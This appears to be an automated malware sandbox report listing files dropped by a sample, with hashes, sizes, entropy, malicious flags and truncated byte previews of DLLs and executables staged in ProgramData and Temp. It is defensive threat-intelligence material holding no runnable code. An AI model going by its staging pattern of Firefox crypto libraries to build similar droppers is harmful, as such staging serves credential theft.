File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\xQfUeydaBrjuHptx.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3632640
Entropy (8bit):	6.982049154160612
Encrypted:	false
SSDEEP:
MD5:	9C815131562310CCECBBE81C49E57029
SHA1:	71B782B3C19123B2C6AAB622ED365ACFB8110CBA
SHA-256:	4954AE0F16D41249DA84F1FCA804B5E38D4AB9E637F8AE41C8FD65B14DF256BC
SHA-512:	5734AE24418BE7A6249EB5CB955E84871148BBD6DEE75DA467C0247905DE7327B165B5153C3312E43D14FB1B547EE584034FF1BD29C45246C0B2A32E8CF6D37C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.e.........."...0..j7...........7.. ....7...@.. ........................7...........@...................................7.S.............................7...................................................... ............... ..H............text....i7.. ...j7................. ..`.reloc........7......l7.............@..B..........................................................7.....H............).....b....................................................(.......8.Y........ir.....~.(.......8.Y..S.$k.....H...)hL`............HN.{......5H....]f.9U."T.;..g,........>[A......;u.X,RqN,...H"l.Xi..D.Y..../.....)..,.j.....8..O.\|oV...s].....XsBl..l..D....?.kM.5.X.."..CL...../.W..=.............3.b..).]1....dA.%..6.#..%..\>..^...s....'..p%d......i?....G...84N.y.;>.:.H......m8.aC..z.=...E."o......l!B..M/.g.._..s...Z...<.7C.,.Q...."F@~...iq.j0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\617D.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\617D.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.355760272568367
Encrypted:	false
SSDEEP:
MD5:	FC3575D5BE1A5405683DC33B66D36243
SHA1:	1C816D34B7D5B96E077DC3EF640BA8C7BA370502
SHA-256:	1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
SHA-512:	68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9234.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2020
Entropy (8bit):	5.352640624208633
Encrypted:	false
SSDEEP:
MD5:	1820783460640EE3A5B216BE1A8C8BAE
SHA1:	E94E1039090EB9AA4B7C473C4921E84A9B62EB88
SHA-256:	6684103BDBB8BBA7F861D06BC7F43CA2D70F144BC99F085F55088BEBD772F0B8
SHA-512:	B003726B25E0DFD1668165C51034BC2FF7A77977A7EC1CD31283713EBD118B5B732F907A33B546A49471029040E5BCC2D91F0992A8D202F5121E7EE9779AC00D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3613.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\3613.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3FF8.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\3FF8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4BEF.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BEF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7D14.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\7D14.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2545
Entropy (8bit):	5.330114603578639
Encrypted:	false
SSDEEP:
MD5:	FA369B3B2029B34A356FF646A278D2A6
SHA1:	BBEA84BDD9CEDF32C51AAC4F95E82B105BCF81BF
SHA-256:	3E580E661FF83779E4B6CDA9B21DC7DBEEF781755605DB82F5377EB2132DAA48
SHA-512:	C9A1EBCEFC42473B13C4F25910F69DB458E4F3E8D0858ECB9143E997E004FA67665F9AE9735D086EABC22D4D115EDB77011B8225CC18C2DBDAADB75D55A1ED77
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicK

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\907.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\907.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\A203.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\A203.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Reputation:	unknown
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	108328
Entropy (8bit):	4.020143028778883
Encrypted:	false
SSDEEP:
MD5:	3E0E0F89113F7642918CD8CAC0617847
SHA1:	6764A44720AE1DBDE2932F454B71FE778422AF1E
SHA-256:	702CBFA4EFD5F9A1B0727872BCAA26AEE6BAD6A5AD93B1C8CD225655BB79BEFC
SHA-512:	F5585CAF5CAF675D0D3859E01299EFF38D2D87CE71FDBEB678E85D37071259ED0772613FF299F1198728169A1BF4C06BB394800059EC096BF36042F88E01CE76
Malicious:	false
Reputation:	unknown
Preview:	....h... ...(...........P...............[...0...`.......................Y.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107504
Entropy (8bit):	4.0265969844515075
Encrypted:	false
SSDEEP:
MD5:	E57C8C736C58B131B4748AEF0F2D5786
SHA1:	A1803A9C0CF3E2313D59725BAE4E94BD10AD34B6
SHA-256:	50E11DD64FB411ED5E0A127205DD96F7BB5D36744A3DBE3B84B7C9D32F6FD4E9
SHA-512:	C12F09CD5783C041732AC87A2FDF55D70DDFE59037D18464416B77D4D0A9AE9EEADDAAC0949B2D981661BBDD80F4C3AB3979C35AB377B649D3BD1FEDB62736AD
Malicious:	false
Reputation:	unknown
Preview:	....h... ..............P...............[.......`...H..............x...Y.......e.n.-.C.H.;.e.n.-.G.B...............h..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\G1AVDGR2.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	12
Entropy (8bit):	2.1258145836939115
Encrypted:	false
SSDEEP:
MD5:	416B4BAB4CCD524D0B3EB958E5486867
SHA1:	E5E94B6F9F22E9FCD96613544935E9948B523E55
SHA-256:	BE4EFD67A84F76F86829B7CE4AE4F0E2C091C778D2E2AF9D6A3BC4EA6AB7D396
SHA-512:	306BFF69AC28C25504276FC96CFFB620F38D9127244E20078E4D44805B87DDA541E51D2246CA9BDE0D48BCFE79DB94402CC735F89BF6679B917985596A9FC956
Malicious:	false
Reputation:	unknown
Preview:	212.102.41.2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\syncUpd[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	183808
Entropy (8bit):	6.997216731878316
Encrypted:	false
SSDEEP:
MD5:	F2AD59753E17F68CF6F6F251E0D4DEEC
SHA1:	1FB2EA00DEA61357F260892A71E760B80FAF8C68
SHA-256:	24A617155FAB47FEA082076061BB97CC3B16C03C84691DC1CE62675764D587DA
SHA-512:	414BADB28F29FE7A3199AA7B909283E02EC06141E0EF99BAAA6E9FFC450D37BAC70EC7A7DBBA41FE217E40156142DC6BDAE4DE4A3BD79B69373E3307F1E7B5D1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L....l.d.....................B......<.......@....@...........................D.....i.......................................(k..d.....D.@Q...........................A...............................^..@............@...............................text....(......................... ..`.rdata..~4...@...6..................@..@.data...\|.B..........d..............@....rsrc...@Q....D..R...\|..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Reputation:	unknown
